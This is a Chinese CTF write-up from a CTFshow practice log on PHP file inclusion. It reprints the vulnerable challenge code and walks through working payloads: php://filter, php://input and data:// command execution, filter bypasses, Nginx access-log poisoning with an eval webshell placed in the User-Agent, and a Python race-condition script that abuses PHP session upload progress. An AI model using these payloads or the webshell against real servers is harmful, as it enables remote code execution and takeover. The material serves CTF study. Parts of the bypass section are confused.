文件包罗(CTFshow 刷题记载)持续更新
实现过滤功能,是每个代码段进行过滤编写,还是写一个过滤文件[*]每个须要过滤的地方,进行一次过滤的编写
[*]每个须要过滤的地方,进行一次文件包罗调用过滤函数
[*]配合文件上传进行getshell,图片带有脚本后门代码,包罗这个图片,脚本代码就被触发
[*]配合日记文件进行getshell,日记会记载访问UA
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
} else {
highlight_file(__FILE__);
}
file:// 用于访问本地文件体系,其格式为
file:// [文件的绝对路径和文件名]
php:// 访问各个输入/输出流(I/O streams),其基本格式为php://filter和php://input
php://filter用于读取源码。
我们可以以base64编码的方式读取指定文件的源码:如
?file=php://filter/read=convert.base64-encode/resource=flag.php
php://input用于执行php代码。?file=php://input
post传参 <?php phpinfo(); ?>
例题二
https://i-blog.csdnimg.cn/direct/e70ed104176e4a92b03f08df6dc40a25.png
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 10:52:43
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 10:54:20
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
include($file);
}else{
highlight_file(__FILE__);
}
想要用这个必须要知道绝对路径,否则如下图
https://i-blog.csdnimg.cn/direct/7868f2ee493948b59b93ac00daaa94c1.png
方法一:filter伪协议
?file=php://filter/read=convert.base64-encode/resource=flag.php
方法二:input协议file=php://input
post传参
<?php phpinfo(); ?>
方法三:data协议
data:// 协议的格式为 data://[<MIME-type>][;charset=<encoding>][;base64],<data>,具体填写方式如下:
1. 基本结构
[*]<MIME-type>:指定命据的类型(如 text/plain、image/png 等)。若省略,默认为 text/plain。
[*]charset=<encoding>:可选,指定文本数据的字符编码(如 charset=UTF-8)。仅对文本类 MIME 类型有效。
[*];base64:可选,表现 <data> 部分为 Base64 编码格式。若省略,数据需直接明文填写。
[*]<data>:实际数据内容(明文或 Base64 编码后的字符串)。
?file=data://text/plain,<?php system('tac flag.php');?>
例题三
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
审计源码可知存在巨细写绕过
但是巨细写绕过对input和data协议有用,对filter协议没有用
方法同例题1
?file=data://text/plain,<?Php system('tac f*');?>
例题四
https://i-blog.csdnimg.cn/direct/3817137008e44ac69b6f7c1e3036ea6d.png
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 11:26:29
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
对php和data协议进行了绕过,那么我选择input协议
https://i-blog.csdnimg.cn/direct/06af9176bc81428b962c8aeaa80b6afb.png
例题五
https://i-blog.csdnimg.cn/direct/7757ab9f46094e80986faaead1f5eda7.png
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-16 11:25:09
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-16 15:51:31
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['file'])){
$file = $_GET['file'];
$file = str_replace("php", "???", $file);
$file = str_replace("data", "???", $file);
$file = str_replace(":", "???", $file);
include($file);
}else{
highlight_file(__FILE__);
}
这次多了限制,我们可以使用日记包罗getshell方法
日记文件是服务器用来记载各种操作和访问信息的文件,好比网站服务器会记任命户的访问哀求、泉源地址、使用的浏览器信息等。如果攻击者能够在发送给网站的哀求(好比网址、用户代理信息等)中插入恶意代码,这些代码就会被服务器记载到日记文件中。当服务器后续读取或处理这些日记文件时,如果存在漏洞,恶意代码就可能被当作正常的代码执行,从而实现攻击目的,好比获取服务器的控制权(即“getshell”)。
确定服务器类型
在进行攻击之前,须要先判断目的网站使用的是哪种服务器软件,因为差别的服务器软件日记文件的存放位置和格式可能差别。
详细攻击步骤解析(利用PHP Session上传进度 + 条件竞争)
1. 漏洞背景
题目代码存在文件包罗漏洞,但过滤了php、data、:、.等关键字符,无法直接包罗恶意文件。需利用PHP的session.upload_progress机制和条件竞争绕过限制
2. 核心原理
[*]Apache服务器:它是一种常见的Web服务器软件,它的日记文件通常存放在/var/log/apache/access.log路径下。这个文件会记载网站的访问记载,包括用户哀求的网址、时间、状态码等信息。
[*]Nginx服务器:这也是另一种常用的Web服务器软件,它的日记文件一样平常存放在/var/log/nginx/access.log和/var/log/nginx/error.log路径下。access.log记载正常访问信息,error.log记载错误信息。
[*]https://i-blog.csdnimg.cn/direct/636ae7e6d4d94dda88cf100e16eaacbe.png
[*] 可见使用Nginx服务器
?file=/var/log/nginx/access.log
在user-agent添加木马
<?php @eval($_REQUEST['cmd']);?>
antsword毗连
例题六
[*] 过滤了冒号,伪协议不好用了,于是,这个题还是用web80的getshell方法,得到flag
[*] 例题七
[*]https://i-blog.csdnimg.cn/direct/7155617beff941d0ac89c4f1483006d6.png
[*] 该死的只能在十一点半后才能做,只能把电脑带回去了
web82 -86 都使用PHP_SESSION_UPLOAD_PROGRESS进行文件包罗
原理表明
[*]文件上传进度监控开启该选项后,用户上传文件时可以通过 POST 哀求实时检察上传进度。
[*]Session 代码注入我们可以在服务器会话(session)中写入待执行的代码,使其在后续流程中被执行。
[*]自定义 Session ID用户可以通过修改 Cookie(如 PHPSESSID=flag)自定义 Session ID,PHP 会据此在服务器上生成对应的 Session 文件(如 /tmp/sess_flag)。文件名中的 sess_ 前缀是固定的,但后续部分(如 flag)可由用户控制。
[*]Session 文件包罗执行要触发代码执行,需通过文件包罗(如 include)加载这个 Session 文件。
[*]主动清算机制 默认设置下,PHP 的 session.upload_progress.cleanup 功能会在读取完全部 POST 数据后主动删除进度信息,导致注入的代码被扫除。
[*]条件竞争利用
为了绕过清算机制,须要利用条件竞争(Race Condition):在体系主动清算前,争先完成文件包罗并执行代码。这种手法在文件上传漏洞利用中很常见,本质是“赶在体系删除前抢占执行权”
[*] Session上传进度机制
PHP在上传文件时,若启用session.upload_progress.enabled(默认开启),会在$_SESSION中记载上传进度,并生成临时Session文件(如/tmp/sess_<PHPSESSID>)
用户可控Session ID
通过Cookie: PHPSESSID=evil
可指定Session文件名(如/tmp/sess_evil),并注入恶意代码到Session文件
[*] 条件竞争
默认session.upload_progress.cleanup=On会立即删除Session文件,需在删除前争先包罗该文件执行代码
3. 详细攻击步骤
步骤1:构造恶意Session文件
[*] 设置自定义Session ID
在哀求中注入Cookie,控制Session文件名:
Cookie: PHPSESSID=evil
PHP会生成文件:/tmp/sess_evil。
[*] 触发Session写入
通过上传表单的PHP_SESSION_UPLOAD_PROGRESS字段写入恶意代码:
<form action="http://target.com/" method="POST" enctype="multipart/form-data">
<input type="hidden" name="PHP_SESSION_UPLOAD_PROGRESS" value="<?php system('cat /flag'); ?>" />
<input type="file" name="file" />
<input type="submit" />
</form>
结果:/tmp/sess_evil内容变为:
upload_progress_<?php system('cat /flag'); ?>
步骤2:利用文件包罗漏洞
[*] 包罗Session文件
由于.被过滤,需直接包罗路径:
GET /?file=/tmp/sess_evil
问题:PHP会立即删除该文件,需条件竞争。
[*] 主动化竞争脚本
使用Python并发哀求:
[*]线程1:持续上传文件,保持Session文件存在。
[*]线程2:高频哀求/?file=/tmp/sess_evil,在文件删除前执行代码。
示例脚本:
import requests
import threading
target = "http://target.com/"
session = requests.Session()
session.cookies.set("PHPSESSID", "evil")
def upload():
while True:
files = {"file": ("test.txt", "data")}
data = {"PHP_SESSION_UPLOAD_PROGRESS": "<?php system('cat /flag'); ?>"}
session.post(target, files=files, data=data)
def include():
while True:
r = session.get(f"{target}?file=/tmp/sess_evil")
if "flag{" in r.text:
print(r.text)
break
t1 = threading.Thread(target=upload)
t2 = threading.Thread(target=include)
t1.start()
t2.start()
步骤3:绕过过滤
[*] 路径绕过
若/tmp/sess_evil被过滤,实验:
GET /?file=/tmp/sess_evil
/. 或利用/proc/self/fd/<FD>(需情况支持)
4. 关键点总结
[*]Session控制:通过PHPSESSID指定文件名,注入恶意代码。
[*]竞争窗口:在PHP删除前包罗文件,需毫秒级并发哀求。
[*]绕过过滤:直接路径包罗,制止使用被过滤字符
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]